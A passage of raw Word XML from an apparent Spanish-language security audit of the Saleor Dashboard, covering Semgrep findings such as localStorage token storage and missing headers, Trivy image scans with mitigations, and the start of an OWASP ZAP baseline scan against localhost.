                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">_ensure_staff_access</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(asigna todos los permisos y</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">is_staff</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Mínimo privilegio: asignar grupo/rol acotado, no</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">get_permissions()</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">completo; validar dominio/email server-side; revisión de configuración.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="sast-semgrep-hallazgos-e-interpretación"/>
      <w:r>
        <w:t xml:space="preserve">2.2 SAST (Semgrep) — hallazgos e interpretación</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Semgrep (rulesets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p/javascript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p/typescript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p/react</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">p/secrets</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comando de reproducción (en</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">saleor-dashboard/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> install semgrep</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">semgrep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --config p/typescript --config p/react --config p/secrets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--severity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ERROR --severity WARNING </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">src/discounts/components/CouponPracticeButton</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> src/legacy-sdk/core src/index.css </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">--sarif</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> --output semgrep.sarif</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar aquí la salida cruda de Semgrep / semgrep.sarif]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="X9c4a9f3a6982bc93610814b11020e91a5670260"/>
      <w:r>
        <w:t xml:space="preserve">Hallazgos verificados (inspección estática mapeada a reglas Semgrep)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000.0"/>
        <w:tblLook w:firstRow="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="377"/>
        <w:gridCol w:w="2765"/>
        <w:gridCol w:w="2137"/>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="138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Regla aprox. Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Archivo : línea</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Hallazgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:bottom w:val="single"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Severidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">typescript.react.security.audit.react-no-any</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:75,83</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uso de</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">any</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">en frontera de datos → se pierde validación de la respuesta de red.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">javascript.browser.security.insecure-storage.local-storage-token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">legacy-sdk/core/storage.ts:37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Token de sesión (refresh) almacenado en</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">localStorage</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, accesible a cualquier script.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">generic.nginx.security.missing-security-headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">nginx/default.conf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Servidor web sin CSP ni cabeceras de seguridad.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">S4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">javascript.apollo.graphql-overfetch</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(custom)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">CouponPracticeButton.tsx:5-37</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sobre-consulta de datos sensibles (códigos de cupón) en cliente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">INFO/WARNING</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Interpretación.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Semgrep confirma dos clases de riesgo relevantes en el Dashboard: almacenamiento inseguro de credenciales (S2) y exposición de datos sensibles por sobre-consulta (S4). S1 enlaza directamente con la deuda de tipado de la Sección 1: el mismo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">any</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">que degrada mantenibilidad también degrada seguridad, porque desactiva validaciones sobre datos no confiables que vienen de la red. S3 es un hallazgo de configuración que ZAP corrobora de forma dinámica (2.4).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="trivy-cves-en-imágenes-docker"/>
      <w:r>
        <w:t xml:space="preserve">2.3 Trivy — CVEs en imágenes Docker</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Herramienta:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trivy (escaneo de imagen y de filesystem).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Imágenes objetivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">saleor-dashboard/Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">): build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node:24-alpine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; runtime</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">nginx:stable-alpine</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(la imagen desplegada). Dependencias notablemente desactualizadas en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">package.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@apollo/client@3.4.17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(≈2021),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-router-dom@^5.3.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(v5).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comando de reproducción:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Imagen de runtime ya construida</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> build -t saleor-dashboard:lab saleor-dashboard/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trivy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> image --severity HIGH,CRITICAL saleor-dashboard:lab</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Imagen base de runtime directamente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trivy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> image --severity HIGH,CRITICAL nginx:stable-alpine</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Dependencias JS (vulnerabilidades de paquetes)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">trivy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fs --scanners vuln saleor-dashboard/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">[Pegar aquí la tabla de CVEs reportada por Trivy]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Qué esperar / interpretar.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Trivy reporta dos superficies: (a) CVEs del</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">SO base Alpine/Nginx</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(paquetes OpenSSL, libxml2, zlib, etc. según la fecha de la base); y (b) CVEs de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">dependencias npm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">desactualizadas —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@apollo/client@3.4.17</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">react-router-dom@5.x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">están varias</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">major/minor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">por detrás y suelen aparecer como vulnerabilidades de severidad media/alta. La mitigación es fijar imágenes base parcheadas (re-build periódico) y actualizar dependencias (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm up</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), validando con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pnpm audit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="owasp-zap-baseline-scan"/>
      <w:r>
        <w:t xml:space="preserve">2.4 OWASP ZAP — baseline scan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Estado:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ejecutado por el equipo (se dispone de la herramienta). Procedimiento y plantilla a continuación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Servicio objetivo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dashboard servido en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:9000/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(dev server) o el contenedor de Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Comando de reproducción:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> run --rm -t -v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:/zap/wrk:rw"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ghcr.io/zaproxy/zaproxy:stable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">zap-baseline.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -t http://host.docker.internal:9000/ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
